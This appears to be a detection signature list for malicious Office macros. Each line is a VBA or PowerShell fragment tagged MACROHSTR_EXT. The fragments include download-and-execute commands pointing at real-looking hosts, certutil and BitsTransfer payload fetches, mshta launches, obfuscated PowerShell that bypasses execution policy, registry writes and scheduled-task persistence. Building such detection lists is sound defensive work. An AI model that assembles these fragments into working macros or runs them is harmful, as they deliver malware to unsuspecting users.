 - binaryStream.Open (MACROHSTR_EXT)
 - binaryStream.SaveToFile (MACROHSTR_EXT)
 - .createElement("tmp") (MACROHSTR_EXT)
 - Shell1.ShellExecute fp (MACROHSTR_EXT)
 - Set objShell = CreateObject(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (MACROHSTR_EXT)
 - objShell.Run (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) (MACROHSTR_EXT)
 - Set objShell = Nothing (MACROHSTR_EXT)
 - = Environ(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.EmailSubject) (MACROHSTR_EXT)
 - StrComp("R982hd023ufdh29k", (MACROHSTR_EXT)
 - objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48) (MACROHSTR_EXT)
 - objWMIService.ExecQuery("SELECT * FROM Win32_Processor", "WQL", _ (MACROHSTR_EXT)
 - ("winmgmts:\\" & dotSplace & "\root\cimv2") (MACROHSTR_EXT)
 - "TargetedEmployees180821.xlsm" Then (MACROHSTR_EXT)
 - = CreateObject("WScript.Network") (MACROHSTR_EXT)
 - = Environ("Temp") & "\Details.dat" (MACROHSTR_EXT)
 - = Environ("Temp") & "\TEDetails.dat" (MACROHSTR_EXT)
 - = Environ("Temp") & "\IncDetails.log" (MACROHSTR_EXT)
 - .Open "get", "https://cr1m3.work/2/NFE-010920.exe", False (MACROHSTR_EXT)
 - hahaha = "htt" + "p" + "s" + ":" + "//" + "w" + "w" + "w" + ".bitly.com/ (MACROHSTR_EXT)
 - Sheet2.microsoft.ShellExecute Sheet3.lol, Sheet1.hahaha (MACROHSTR_EXT)
 - Outlook.CreateObject("Shell.Application") (MACROHSTR_EXT)
 - .Run(rljteogjxojdhqrepmhivsyorvlzk, byqssxsziomlzmmfqvtobuzgadpefexrnlz) (MACROHSTR_EXT)
 - Application.Run ("Apply.Pick") (MACROHSTR_EXT)
 - Application.Run ("Start.Work") (MACROHSTR_EXT)
 - Application.Run ("Windows.Continue") (MACROHSTR_EXT)
 - Application.Run ("SmartWork.SmartWork") (MACROHSTR_EXT)
 - streaksmv51 = upholdsnv51 & ".ma" & "in" (MACROHSTR_EXT)
 - Application.Run (streaksmv51) (MACROHSTR_EXT)
 - = CreateObject(Chr$(87) & "ord.Ap" & "pli" & "cat" & "ion") (MACROHSTR_EXT)
 - = "C:\Windows\" (MACROHSTR_EXT)
 - = CreateObject(Chr$(87) & "S" & "cr" & "ip" & "t." & "sh" & "ell") (MACROHSTR_EXT)
 - .RegWrite guignolrgv51, newValue, "REG_DWORD" (MACROHSTR_EXT)
 - .Run(phaykhpoufvxoenvriretw, octoiwwojgbevkpnwyhzektsnnydyzs) (MACROHSTR_EXT)
 - 'hjgjg ffhg5645n /*/ (MACROHSTR_EXT)
 - = Shell(StrReverse("sbv.nip\ataDmargorP\:C exe.tpircsc k/ dmc"), Chr(48)) (MACROHSTR_EXT)
 - = "@" Or Mid$(Email, Len(Email), 1) = "@" Or InStr(Email, "@.") (MACROHSTR_EXT)
 - xmlHttp.Open "GET", sURL, False (MACROHSTR_EXT)
 - xmlHttp.send "" (MACROHSTR_EXT)
 - fsT.Open 'Open the stream And write binary data To the object (MACROHSTR_EXT)
 - fsT.WriteText (GetHTMLSource("https://wtools.io/code/dl/b6Jh")) (MACROHSTR_EXT)
 - fsT.SaveToFile "x.vbs", 2 'Save binary data To disk (MACROHSTR_EXT)
 - CreateObject("WScript.Shell").Run "x.vbs", 0, False (MACROHSTR_EXT)
 - networkpositive = "C:\Users\Public\Documents\heavysocial.c" & Chr(109) & "d" (MACROHSTR_EXT)
 - -w hi sle^e^p -Se 31;Start-BitsTransfer -Source htt`ps://cdn.discordapp.com/attachments/879094696843038753/889410069207351376/RP.e`xe (MACROHSTR_EXT)
 - CreateObject(sheee & "l.application").Open(networkpositive) (MACROHSTR_EXT)
 - Set objWshShell = CreateObject("WScript.Shell") (MACROHSTR_EXT)
 - Range("A1").Value = (MACROHSTR_EXT)
 -  / 2021 (MACROHSTR_EXT)
 - ://www.j (MACROHSTR_EXT)
 - Print #1, Replace(ActiveDocument.Range.Text, "&lt;", "") (MACROHSTR_EXT)
 -  & "...hTa" (MACROHSTR_EXT)
 - .run rap (MACROHSTR_EXT)
 - Source htt`p://18.195.143.183/ (MACROHSTR_EXT)
 - .e`xe (MACROHSTR_EXT)
 - -Destination C:\Users\Public\Documents\ (MACROHSTR_EXT)
 - powershell -Exec bypass -NonI -W Hidden (('& ((GeT" (MACROHSTR_EXT)
 - -VARIAble SXB*MDr*SXB).naMe[3,11,2]-joiNSXBSXB)( (" (MACROHSTR_EXT)
 - mANAgement.AuToMaTION.PsCr'+'EDeNT" (MACROHSTR_EXT)
 - CuREstrING -k  (2'+'27..242) ) '+').getNETworkCred" (MACROHSTR_EXT)
 - ENtIal().PaSSword)') -rePLaCe  ([CHaR]97+[CHaR]56+" (MACROHSTR_EXT)
 - CreateObject("Wscript.Shell").Run Str (MACROHSTR_EXT)
 - accessPopEarth.run excelHipExcel (MACROHSTR_EXT)
 - .microsoftHopRock officeExcelOffice & ".....hta.", Replace(ActiveDocument.Range.Text, "&lt;", "") (MACROHSTR_EXT)
 - Source htt`p://18.195.143.183/7/7/IMG_ (MACROHSTR_EXT)
 - = CreateObject(sheee & "l.application") (MACROHSTR_EXT)
 - .Open(behaviorexactly) (MACROHSTR_EXT)
 - = Environ("LocalAppData") & "\think-cell" (MACROHSTR_EXT)
 - & "\test.dll" (MACROHSTR_EXT)
 - = "llExe" (MACROHSTR_EXT)
 - = "s://" (MACROHSTR_EXT)
 - = "e." (MACROHSTR_EXT)
 - = "ogs." (MACROHSTR_EXT)
 - Sheet1.Activate (MACROHSTR_EXT)
 - "start /MIN C:\Windo" (MACROHSTR_EXT)
 - "ws\System32\" + "WindowsPo" + "werShell\v1.0\pow" + "ershell.exe" (MACROHSTR_EXT)
 - Shell(batch, 0) (MACROHSTR_EXT)
 - batch = " (MACROHSTR_EXT)
 - CreateObject(sheee & "l.application").Open(lineagency) (MACROHSTR_EXT)
 - .bat (MACROHSTR_EXT)
 - = "p^o^w^e^R^Sh^eLL^.e^X^e ^-e^x^ec^u^tI^o^nP^OLIcY (MACROHSTR_EXT)
 - & " -w hi slee^p -Se 31;Sta^rt-BitsTrans^fer -Source htt`p://18.195.143.183/7/7/ (MACROHSTR_EXT)
 - .e`xe" (MACROHSTR_EXT)
 - & " -Destination C:\Users\Public\Documents\ (MACROHSTR_EXT)
 - obh = CreateObject(sheee & "l.application").Open( (MACROHSTR_EXT)
 - = Decrypt("fyf/jjkj") (MACROHSTR_EXT)
 - Bkcbyhanppaqrfw.bat (MACROHSTR_EXT)
 - DecryptIjhfddfdgdfbvgjsfdhdgdfjfsf("fyf/mmdd") (MACROHSTR_EXT)
 - Environ$("UserDomain") & "\" & Environ$("ComputerName") & "\" & Environ$("Username") (MACROHSTR_EXT)
 - = WshShell.Exec("taskkill /fi ""imagename eq msedge.exe""") (MACROHSTR_EXT)
 - = WshShell.Exec("taskkill /fi ""imagename eq iexplorer.exe""") (MACROHSTR_EXT)
 - Left(uuuuc, ntgs) & "Local\" & iox & "emp", vbDirectory) = "" Then (MACROHSTR_EXT)
 - Call Primer1(Folder & "\" & f1.Name & "\") (MACROHSTR_EXT)
 - jvc = ddd & "\zoro.doc" (MACROHSTR_EXT)
 - Debug.Print (VBA.Shell(c5YBWE6YP + rewDH1s8D + LRpBcKjpo + wJ9wo1Xlx)) (MACROHSTR_EXT)
 - wob = CreateObject("wscript.shell") (MACROHSTR_EXT)
 - & "\de" & "sk" & "to" & "p.ini" (MACROHSTR_EXT)
 - ini = Replace(ini, "\", "\\") (MACROHSTR_EXT)
 - xHttp.Open "GET", "http://speedtest.tele2.net/10MB.zip", False (MACROHSTR_EXT)
 - xHttp.Open "GET", "https://list24.online/msp.exe", False (MACROHSTR_EXT)
 - .savetofile "10MB.zip", 2 (MACROHSTR_EXT)
 - .savetofile "C:\Windows\Temp\msp.exe", 2 (MACROHSTR_EXT)
 - xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP") (MACROHSTR_EXT)
 -  (108, 10)).CreateObject( (MACROHSTR_EXT)
 -  (102, 14), "").Run  (MACROHSTR_EXT)
 -  .TextBox1.Text &  (MACROHSTR_EXT)
 - , "DD.MM.YYYY") (MACROHSTR_EXT)
 - specialpath=wshshell.specialfolders("recent") (MACROHSTR_EXT)
 - =specialpath+("\zr.").open"get",("h://djkmw.m.l.1dv.m/4mmz6hkzfht (MACROHSTR_EXT)
 - =1range("j1").value="eklibelgeyiama"msgbox"pleasewait...."range("bc3").value= (MACROHSTR_EXT)
 - ActiveWorkbook.Password = "pago2022" (MACROHSTR_EXT)
 - = Environ$("AppData") & "\" & (MACROHSTR_EXT)
 - /hojmsvi.tk/xxx00 (MACROHSTR_EXT)
 - =environ$("appdata")&"\"& (MACROHSTR_EXT)
 - setobjwshshell=createobject("wscript.shell")specialpath=objwshshell.specialfolders("templates") (MACROHSTR_EXT)
 - =createobject("shell.application")=specialpath+("\mjhm.").open"get" (MACROHSTR_EXT)
 - Url = "http://211.252.131.224/2021/image/4qmal.gif (MACROHSTR_EXT)
 - Download_Go.SaveToFile "C:\Temp\4qmal.gif", 2 (MACROHSTR_EXT)
 - = VBA.CreateObject("WScript.Shell") (MACROHSTR_EXT)
 - = "/c " & "rename " & "C:\Temp\4qmal.gif 4qmal.exe" (MACROHSTR_EXT)
 - wsh.Run "C:\Windows\System32\cmd.exe " & cmdText, (MACROHSTR_EXT)
 - NmBEcAvAjcpCLBfEaWzChWid.Run NSZIRbryXtSZhGDHwrGqqyc, gBbaiUwesq, True (MACROHSTR_EXT)
 - CreateObject(zbziynkoqeyb("575363726970") & zbziynkoqeyb("742e5368656c6c")).Run (MACROHSTR_EXT)
 - Chr$(Val("&H" & Mid$(cmazxducfgnm, yjzbjvipifjl, 2))) (MACROHSTR_EXT)
 - .Open ksooylmybogf("474554"), naotktxlknpjx, False (MACROHSTR_EXT)
 - Environ("TEMP") & "\" & dlakaokklnsrrus (MACROHSTR_EXT)
 - CreateObject("Wscript.Shell").EXEC  (MACROHSTR_EXT)
 - = VBA.Replace("msh (MACROHSTR_EXT)
 - = " http://j.mp/" (MACROHSTR_EXT)
 - Debug.Print MsgBox("Re-Install Office", vbOKCancel); returns; 1 (MACROHSTR_EXT)
 - =specialpath+("\mhk.").open (MACROHSTR_EXT)
 - =wshshell.specialfolders("recefvdzb") (MACROHSTR_EXT)
 - =getdesktop+huguhhjghjgtroin(jhbhefverfd.oin)moijhiuf.open"iiuky" (MACROHSTR_EXT)
 - .value="<<ok......ok>>"msgbox"<<ok......ok>> (MACROHSTR_EXT)
 - =specialpath+omjihjnbhghghgvjv("i^_oxduxv[;nn")cstesu.open"get",omjihjnbhghghgvjv (MACROHSTR_EXT)
 - .writetfdveghoimjin.savetofilexyuhvla,vtfqcyw+vtfqcyw+fdsnkjnsd+ojhihbhjbboimjin. (MACROHSTR_EXT)
 - .open(xyuhvla)endsubfunction (MACROHSTR_EXT)
 - ubun3.Tag (MACROHSTR_EXT)
 - gando.uganda (MACROHSTR_EXT)
 - =specialpath+("\vtgr.").open"get",("h://www.w.m/dgdzvdvgdzvkbvhdzgg/bkjbgkgkjhjdhjdjgjhkgkjhjdhjdjgjbkjbg. (MACROHSTR_EXT)
 - =specialpath+("\gx.").open"get",("h://www.-k.g/w/kljkjghkjwwhgkkhjbwbbgj/bzbbgd. (MACROHSTR_EXT)
 - =specialpath+("\wmfftx.").open"get",("h://jvmkg.m/hkbv/jbhbmgjbvwvgqg. (MACROHSTR_EXT)
 - =specialpath+("\ (MACROHSTR_EXT)
 - .").open"get",("h://www.d.m/kjbvdjbhbbvhkzbdkzlbkg/kkjbkjbvh. (MACROHSTR_EXT)
 - = "://www.bitly.com/" (MACROHSTR_EXT)
 - .copyfile "C:\Windows\System32\mshta.exe", Environ("PUBLIC") & "\peee.com", True (MACROHSTR_EXT)
 - "ERROR !!!": Call VBA.Shell _ (MACROHSTR_EXT)
 - kaosk.copyfile Int2Str("067058092087105110100111119115092083121115116101109051050092109115104116097046101120101"), Environ$(Int2Str("080085066076073067")) & Int2Str("092112101101101046099111109"), True (MACROHSTR_EXT)
 - specialpath=wshshell.specialfolders("appdata") (MACROHSTR_EXT)
 - .").open"get",("h://www.d.m/qmzlbkg/khbvh. (MACROHSTR_EXT)
 - .").open"get",("h://www.d.m/gjkkhhhg/kjdh. (MACROHSTR_EXT)
 - .adnoc-distributions.com/projects/enquiry.zip (MACROHSTR_EXT)
 - C:\Users\" & Environ("UserName") & "\Documents (MACROHSTR_EXT)
 - = CreateObject("WScript.Shell").SpecialFolders("MyDocuments") (MACROHSTR_EXT)
 - ShellApp.Namespace(unzipToPath).CopyHere ShellApp.Namespace(zippedFileFullName).Items (MACROHSTR_EXT)
 - kaosk.copyfile (MACROHSTR_EXT)
 - GetObject(adjaiwdjiaskd). _ (MACROHSTR_EXT)
 - Get(aksdokasodkoaksd). _ (MACROHSTR_EXT)
 - .").open"get",("h://www.d.m/jhhhdhgh/kkjbkjbvh. (MACROHSTR_EXT)
 - =environ$("userprofile")&"\"& (MACROHSTR_EXT)
 - specialpath=wshshell.specialfolders(" (MACROHSTR_EXT)
 - .").open"get", (MACROHSTR_EXT)
 - ("fyf/ddnn") (MACROHSTR_EXT)
 - fyf/nppghynkcodnkgeihgetigjpusqd0og5oskhks1111nuqpujuvusgehethg0npd/tbojeobspudbsu00;tquui (MACROHSTR_EXT)
 - range("a1").value=" (MACROHSTR_EXT)
 - meinkonhun1.EXEC listen1 + madar2 + janu3 + janu4 + fakir4 (MACROHSTR_EXT)
 - "m" + "s" + "h" + "t" + "a h" + "t" + "t" + "p" + "s" + ":// (MACROHSTR_EXT)
 - paralagloire.com/ (MACROHSTR_EXT)
 -  /11.p (MACROHSTR_EXT)
 - abnewslive.in/ (MACROHSTR_EXT)
 -  /11.pn (MACROHSTR_EXT)
 - onceayearpestcontrol.c (MACROHSTR_EXT)
 - PID = Shell("cmd /c certutil.exe -urlcache -split -f ""https://cdn.discordapp.com/attachments/948578823983726726/948721348170121296/Lqohpshnd.exe"" Rqmmcqpluzlffudaxshi.exe.exe && Rqmmcqpluzlffudaxshi.exe.exe", vbHide) (MACROHSTR_EXT)
 - /ces/ten.snd-cimanyd.ognompux//: (MACROHSTR_EXT)
 - start-process($env:temp+ '\ (MACROHSTR_EXT)
 - pPth = CurDir & "\knla.dat" (MACROHSTR_EXT)
 - Set ws = CreateObject("WS" & "crip" & "t.Sh" & "ell") (MACROHSTR_EXT)
 - Set wpe = ws.Environment("Pro" & "ce" & "ss") (MACROHSTR_EXT)
 - dgt.InstallProduct "https://cvg.org/wp-content/uploads/2020/document.zip (MACROHSTR_EXT)
 - chr50chr48chr48dimwshshellasobjectdimspecialpathasstringsetwshshellcreateobjectwscriptshellspecialpath (MACROHSTR_EXT)
 - =shellexecute(1,strreverse("nepo"),strreverse("exe.llehsrewop"),strreverse("exe.yttup\pmet\swodniw\:cexe.rerolpxe;exe.yttup\pmet\swodniw\:co-exe (MACROHSTR_EXT)
 - C:\Users\Public\update.js (MACROHSTR_EXT)
 - winmgmts:','C:\ (MACROHSTR_EXT)
 - ProgramData\ (MACROHSTR_EXT)
 - ddond.com (MACROHSTR_EXT)
 - mediafire.com/file/vwt2u87jfzpb0f4/3.htm/file (MACROHSTR_EXT)
 - C:\x5cProgramData\x5cddond.com\x20https://www.mediafire.com/file/ (MACROHSTR_EXT)
 - .htm/file (MACROHSTR_EXT)
 - Create ("wscript C:\Users\Public\update.js") (MACROHSTR_EXT)
 - =specialpath+("\qj.").open"get",("h://www.kmlk.m//vdhgggkjzbkgjkjzgk/vhvgwvgqdg. (MACROHSTR_EXT)
 - =1range("ah1").value (MACROHSTR_EXT)
 - GetObject(T8qceb0X("yNg4pV3vmQZ")).Environment(T8qceb0X("NlBVUbaQ")).Remove (T8qceb0X("lVOf6nuJIn")) (MACROHSTR_EXT)
 - GetObject(IHZm_3LYDJGE("Ovsvujx6mXSE")).Environment(IHZm_3LYDJGE("GhUVaDeU")).Remove (IHZm_3LYDJGE("G53smKPbN")) (MACROHSTR_EXT)
 - = StrReverse(ActiveDocument.CustomDocumentProperties(strInput)) (MACROHSTR_EXT)
 -  ")).Value) (MACROHSTR_EXT)
 - GetObject(Qeerere("138124129128122128135134077")).Get(Qeerere("106124129070069114099133130118120134134")).Create (MACROHSTR_EXT)
 - GetObject(Nuts("203213210209219209200207134")).Get(Nuts("235213210143142227236206211223217207207")).Create (MACROHSTR_EXT)
 - = SCQU.Open(v0df + "\cPxNX.bat") (MACROHSTR_EXT)
 - ").Value) (MACROHSTR_EXT)
 - () + "\cPxNX.bat" 'you can specify here the text file name you want to create (MACROHSTR_EXT)
 - GetObject(TnV0cw("136122127126120126133132075")).Get(TnV0cw("104122127068067112097131128116118132132")).Create (MACROHSTR_EXT)
 - = "C:\Windows\System32\findstr.exe /V /L W3AllLov3LolBas \\20.69.97.31\webdav\um.exe > C:\Windows\Temp\um.exe && exit (MACROHSTR_EXT)
 - GetObject(Range("A106").Value) (MACROHSTR_EXT)
 - SYqP.Open(v0df + "\HvTBf.bat") (MACROHSTR_EXT)
 - Range("A103").Value + " -" + Range("A100").Value (MACROHSTR_EXT)
 - JxEw.Open(v0df + "\Sanek.bat") (MACROHSTR_EXT)
 - .DataType = kipftrrwxnypnzf("62696e2e68") & kipftrrwxnypnzf("6578") (MACROHSTR_EXT)
 - .DataType =  (MACROHSTR_EXT)
 - GetObject(Range("B106").Value) (MACROHSTR_EXT)
 - .Open(v0df + "\ (MACROHSTR_EXT)
 - rev(Range("B102").Value) + rev(Range("B100").Value) (MACROHSTR_EXT)
 - myFile = "C:\Users\Public\update.js (MACROHSTR_EXT)
 - Debug.Assert VBA.Shell(a, vbNormalFocus) (MACROHSTR_EXT)
 - = Worksheets("shit").Range("K335") (MACROHSTR_EXT)
 - c c" + "md /" + "c msht" + "a.e" + "xe http://leehr36.mypressonline.com/h.php" (MACROHSTR_EXT)
 - ofp = ndp & "update.exe" (MACROHSTR_EXT)
 - Call oo.RegisterTask("MicrosoftUpdate", xt, 6, , , 3) (MACROHSTR_EXT)
 - = NAMEME.kqWZZ().ShellExecute(KNOZ(), XUNKv(), Null, Null, 0) (MACROHSTR_EXT)
 - WSNh5 = .Shapes(1).TextFrame.Characters.Text (MACROHSTR_EXT)
 - = DDD("QzpcVXNlcnNc") + Application.UserName + DDD("XEFwcERhdGFcUm9hbWluZ1xNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXBcV0hlYWx0aFNjYW5uZXIuZXhl") (MACROHSTR_EXT)
 - .copyfile lorakala, wingadumleviosa, True (MACROHSTR_EXT)
 - = "C:\\ProgramData\\ddond.com https://taxfile.mediafire.com/" + "file/87j3bj0ks0asu58/3.htm/file" (MACROHSTR_EXT)
 - Call VBA.Shell#(kalimuth) (MACROHSTR_EXT)
 - com/file/p3ay4it08j1s7hp/0main.htm/file (MACROHSTR_EXT)
 - https://taxfile.mediafire. (MACROHSTR_EXT)
 - C:\x5cProgramData\x5cddond.com (MACROHSTR_EXT)
 - = "C:\Users\Public\update.js" (MACROHSTR_EXT)
 - KNwS().Exec "Powe" + gm2 + gm3 + gm4 (MACROHSTR_EXT)
 - xOut & VBA.Mid(xValue, i, 1) (MACROHSTR_EXT)
 - UserForm1.iqXGpP(g1) (MACROHSTR_EXT)
 - NAMEME.JPVuz().ShellExecute(lESH(), wPDLo(), Null, Null, 0) (MACROHSTR_EXT)
 - .Shapes(1).TextFrame.Characters.Text (MACROHSTR_EXT)
 - wPDLo = ("ping google.com;" + Istz5) (MACROHSTR_EXT)
 - ")).Value (MACROHSTR_EXT)
 - StrReverse(ActiveDocument.CustomDocumentProperties(strInput)) (MACROHSTR_EXT)
 - O=createobject("wscript.shell")specialpath=wshshell.specialfolders("recent") (MACROHSTR_EXT)
 - range("t1").value=" (MACROHSTR_EXT)
 - /"range("r1").value=" (MACROHSTR_EXT)
 - /"msgbox"trryinfgvvtooptjbfdocumebjkbg" (MACROHSTR_EXT)
 - .open"get", (MACROHSTR_EXT)
 - ( & ".e" & "xe", vbNormalNoFocus (MACROHSTR_EXT)
 - = Split(UserForm1.TextBox (MACROHSTR_EXT)
 - .Text, "f") (MACROHSTR_EXT)
 - vbCritical, "www.excel-vba.ru (MACROHSTR_EXT)
 - specialpath+("\hv.").open"get",("h://www.d.m/gjkkhhhg/kjdh.") (MACROHSTR_EXT)
 - specialpath+("\m.").open"get",("h://ghq.ghb./bh/") (MACROHSTR_EXT)
 - chr(50)+chr(48)+chr(48)setwshshell=createobject("wscript.shell") (MACROHSTR_EXT)
 - .").open"get",("h://www.hkll.m/jvvqwvbgm/kjdh. (MACROHSTR_EXT)
 - .").open"get",("h://www.hkll.m/jkjzdgdlzjkbkbkzjbkjhbg/ghgghhhgbvvmh. (MACROHSTR_EXT)
 - .").open"get",("h://www.d.m/m/ghhm. (MACROHSTR_EXT)
 - .").open"get",("h://www.d.m/bm/. (MACROHSTR_EXT)
 - .").open"get",("h://www.j-hlg.m//vdhhbg/ghgghhhgbvvmh. (MACROHSTR_EXT)
 - .").open"get",("h://www.j-hlg.m/g/djgjhdjjdgjhbghdjkdhghjd/djhdgjgjv1. (MACROHSTR_EXT)
 - .").open"get",("h://.m./bmvq. (MACROHSTR_EXT)
 - = t8g0f.Open(v0df + "\Urhjg.bat") (MACROHSTR_EXT)
 - "C:\Users\" + qaXGi().Namespace(USER_PROFILE) (MACROHSTR_EXT)
 - $ht~tp^://^up~pg$re$de`.^sc@ie^nce`ont~he^we^b@.n~et^/f`il~e/^upl$o$ad^/l$i~st.~php (MACROHSTR_EXT)
 - plqMxj.Open (fNadv + "\GZNGX.js") (MACROHSTR_EXT)
 - ActiveSheet.OLEObjects(1).Copy (MACROHSTR_EXT)
 - aysfhm.open(rdhtj+"\sfowq.js") (MACROHSTR_EXT)
 - activesheet.oleobjects(1).copy (MACROHSTR_EXT)
 - .get(soc3van4se("100118123064063108093127124112114128128")).create (MACROHSTR_EXT)
 - """exe. (MACROHSTR_EXT)
 - /moc.mixeplut//:ptth""" (MACROHSTR_EXT)
 - /moc.enydlelet//:sptth""" (MACROHSTR_EXT)
 - cmd1(XxX, aAa) + URL(XxX, aAa) + cmd2(XxX, aAa) (MACROHSTR_EXT)
 - t8g0f.Open(v0df + "\vXxTY.bat") (MACROHSTR_EXT)
 - C:\Users\" + ZXDdz().Namespace(USER_PROFILE) (MACROHSTR_EXT)
 - Cells(2, 1).Value = 1 (MACROHSTR_EXT)
 - .getfolder("\")dimtaskdefinitionsettaskdefinition=service.newtask(0)dim (MACROHSTR_EXT)
 - hi("c:\users\public\downloads\sdns.zip",path_file+ (MACROHSTR_EXT)
 - specialpath=wshshell.specialfolders("nethood")dimh (MACROHSTR_EXT)
 - =specialpath+bfnfhtyooun("iex_o]wc]x;nn")vbnd.open"get",bfnfhtyooun (MACROHSTR_EXT)
 - shell(nrapoinf,4/8*sin(0))'0000endsub (MACROHSTR_EXT)
 - .").open"get",("h://j-hlg.m/b/mblhdl. (MACROHSTR_EXT)
 - .Open "get", KNkjbGBHJVvh(" (MACROHSTR_EXT)
 - .Open "get", knjbk7gb5bjfg(" (MACROHSTR_EXT)
 - =specialpath+yuiygvjhvhtfhj("iy\_puep;nn")umefpdfmrc (MACROHSTR_EXT)
 - =specialpath+knjbjggjkjfvk("i^_qo\zzz\;nn")hhhjcfjreemhi (MACROHSTR_EXT)
 - =createobject("wscript.shell")endfunction (MACROHSTR_EXT)
 - allfault.execxyzt+l_o4+l_o5endfunction (MACROHSTR_EXT)
 - l_o5="pass-nop-w1;i'e'x(iwr('http (MACROHSTR_EXT)
 - d.open"get", (MACROHSTR_EXT)
 - ("h://j-hlg.m/w/qzghjkdhdg."), (MACROHSTR_EXT)
 - ("h://j-hlg.m/v/hgjjdhdg."), (MACROHSTR_EXT)
 - createobject("wscript.shell")specialpath=wshshell.specialfolders("recent") (MACROHSTR_EXT)
 - powershell-nop-epbypass-c("+"i"+"'"+"w"+"'"+"r"+"('"alo2="http (MACROHSTR_EXT)
 - =getobject("new:f935dc22-1cf0-11d0-adb9-00c04fd58a0b")meinkonhun.execalo3endsub (MACROHSTR_EXT)
 - activedocument.name<>nutff("076076073127138126") (MACROHSTR_EXT)
 - :").get(mid(strarg,1,13)).createmid(strarg,14) (MACROHSTR_EXT)
 - djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj,  (MACROHSTR_EXT)
 - Set djfeihfidkasljf = CreateObject("Shell.Application") (MACROHSTR_EXT)
 - Call T8.run(hn & m & "32 " + D) (MACROHSTR_EXT)
 - Public Const D As String = "Ub.pdf" (MACROHSTR_EXT)
 - frm.download Kr, D (MACROHSTR_EXT)
 - =objwshshell.specialfolders(" (MACROHSTR_EXT)
 - = "cmd /c start /min Pow" (MACROHSTR_EXT)
 - = "g7xBnq/48b9365ec76138129aef695544fdd0a49d85b8f3/files/p000start') -useB); St" (MACROHSTR_EXT)
 - exe.yttup/321/231.031.271.701//:ptth (MACROHSTR_EXT)
 - strreverse("\0.1v\llehsrewopswodniw\23metsys\swodniw\:c"))endsub (MACROHSTR_EXT)
 - =createobject(xqmcrk)alxz.run (MACROHSTR_EXT)
 - ="dz0nhlj1q8ac3.cloudfront.net"method=" (MACROHSTR_EXT)
 - httphttps"filename="malware.exe" (MACROHSTR_EXT)
 - url=method+"://"+host+"/"+filenamelocal (MACROHSTR_EXT)
 - filepath="c:\windows\tasks\"+filename (MACROHSTR_EXT)
 - if.execute>0thenforlcount=1to.foundfiles.countsetwbresults=workbooks.open(filename:=.foundfiles(lcount),updatelinks:=0) (MACROHSTR_EXT)
 - subauto_open()dimshellasobjectdimcommandasstring'specifythepowershellcommandyouwanttoruncommand="get-process"'createanewshellobjectsetshell=createobject("wscript.shell")' (MACROHSTR_EXT)
 - openpowershellandrunthecommandshell.run"powershell&powershell(nslookup-q=txt (MACROHSTR_EXT)
 - .abena-dk.cam)[-1]-nonewwindow",0,false'releasetheshellobjectsetshell=nothingendsub (MACROHSTR_EXT)
 - ^p*o^*w*e*r*s^^*h*e*l^*l**^-*w*i*n*^d*o*w^*s*t*y*^l*e**h*i*^d*d*^e*n^**-*e*x*^e*c*u*t*^i*o*n*pol^icy**b*yp^^ass*;*$tempfile**=**[*i*o*.*p*a*t*h*]*::gettem*pfile*name()|ren^ame-it^em-newname{$_-replace'tmp$','exe' (MACROHSTR_EXT)
 -  = ".": (MACROHSTR_EXT)
 - .open"get",("h://www.vmd.m/mw/hd."),false.send=.responsebodyif.status=200thenset=createobject("adodb.stream").open.type=.write.savetofile,+.closeendif.open()end (MACROHSTR_EXT)
 - set=createobject("microsoft.xmlhttp")set=createobject("shell.application")= (MACROHSTR_EXT)
 - .specialfolders("recent")dimdimdimdimdimdimasintegerdimdim=1range(" (MACROHSTR_EXT)
 - ").value (MACROHSTR_EXT)
 - =createobject("wscript.shell") (MACROHSTR_EXT)
 - .CreateObject("WS" & lz & "cript.Sh" & lz & "ell").Run (MACROHSTR_EXT)
 -  Environ("LocalAppData") & "\list.xsl" (MACROHSTR_EXT)
 - = CreateObject("Adod" & "b.Stre" & "am") (MACROHSTR_EXT)
 - K/psfebnputjsbwftfuspqtobsu/xxx00;tquui") (MACROHSTR_EXT)
 - K=environ$("appdata")&"\" (MACROHSTR_EXT)
 - bhvixl.runbudbaqoaydzobnojdaedugbroly,85710: (MACROHSTR_EXT)
 - getobject(ottawa).createobject(chapters).runfisting (MACROHSTR_EXT)
 - chr((7*2)+(((10-4)*2)*2))&chr((((16/2)*2)+(4*5))*2)&mid(introduce,i+1,2)i=i+2 (MACROHSTR_EXT)
 - workbook_open()florencemills(sheets("l747f").range("e150").value) (MACROHSTR_EXT)
 - getobject(florist).createobject(earrings).runhouseholds (MACROHSTR_EXT)
 - =chr((7*2)+(((10-4)*2)*2))&chr((((16/2)*2)+(4*5))*2)&mid(nurses,i+1,2)i=i+2 (MACROHSTR_EXT)
 - workbook_open()democratsminneapolis(sheets("f2ca").range("h182").value) (MACROHSTR_EXT)
 - .open"get",jnbihbnilbjhvgfvghb("q~~zg<<fa;>bc;?b@;cegbcdf<tprp}vpx}u~qx}<t}urtptqrtq}rqtrutqp~tqpp|t}pqoptop<};nn") (MACROHSTR_EXT)
 - createobjectwscriptshellrundecrypted0endsub (MACROHSTR_EXT)
 - ="https://www.4sync.com/web/directdownload/kokeaq3i/w_vntpcw.341f97c5d71770e770a1043b64ec919c"renancdt="c:\users\public\"urldownloadtofile0,imagemsimplescdt,renancdt&"document.exe" (MACROHSTR_EXT)
 - belongingszw0(petrolkxo)setincomexk4=activedocument.vbproject.vbcomponents.add(1)incomexk4.codemodule.addfromstringratesxpwactivedocument.application.run (MACROHSTR_EXT)
 - l11lll.Run Chr(34) & l11ll1  (MACROHSTR_EXT)
 - .exec p( (MACROHSTR_EXT)
 - "C:\Users\" & Environ("UserName") & "\ (MACROHSTR_EXT)
 - " + "." + "ps1" (MACROHSTR_EXT)
 - ").Shellexecute  (MACROHSTR_EXT)
 -  .Tag,  (MACROHSTR_EXT)
 -  .Tag (MACROHSTR_EXT)
 - 'zipPath = "C:\Program Files (x86)\WinRAR\winRaR.exe" & " x -ibck " & Fname & " *.* " & ThisDocument.Path (MACROHSTR_EXT)
 - oStream.SaveToFile ThisDocument.Path & "\" & "malicious.exe", 2 (MACROHSTR_EXT)
 - oApp.NameSpace(fFolder).CopyHere oApp.NameSpace(fName).items (MACROHSTR_EXT)
 - Application.StartupPath &  (MACROHSTR_EXT)
 - (" I\..\. I." & " I\.. I\.. I\. I.") (MACROHSTR_EXT)
